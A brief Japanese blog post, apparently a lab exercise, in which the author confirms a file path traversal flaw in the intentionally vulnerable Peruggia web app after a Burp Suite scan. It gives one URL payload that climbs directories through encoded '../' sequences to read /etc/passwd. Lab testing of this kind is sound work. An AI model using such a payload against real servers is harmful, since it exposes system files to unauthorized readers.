以下の内容はhttps://cysec148.hatenablog.com/entry/2020/08/04/155140より取得しました。


PeruggiaでFile path traversalを確認してみた

Hello there, ('ω')ノ

 

PeruggiaでBurp SuiteだとFile path traversalを検出できて。

 

f:id:ThisIsOne:20200804154036p:plain

 

リクエストとレスポンスの内容を確認して。

 

f:id:ThisIsOne:20200804154436p:plain

 

下記のURLで現象を確認して。

/peruggia/index.php?action=learn&type=BoF&paper=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

 

f:id:ThisIsOne:20200804154520p:plain

 

Best regards, (^^ゞ




以上の内容はhttps://cysec148.hatenablog.com/entry/2020/08/04/155140より取得しました。
このページはhttp://font.textar.tv/のウェブフォントを使用してます

不具合報告/要望等はこちらへお願いします。
モバイルやる夫Viewer Ver0.14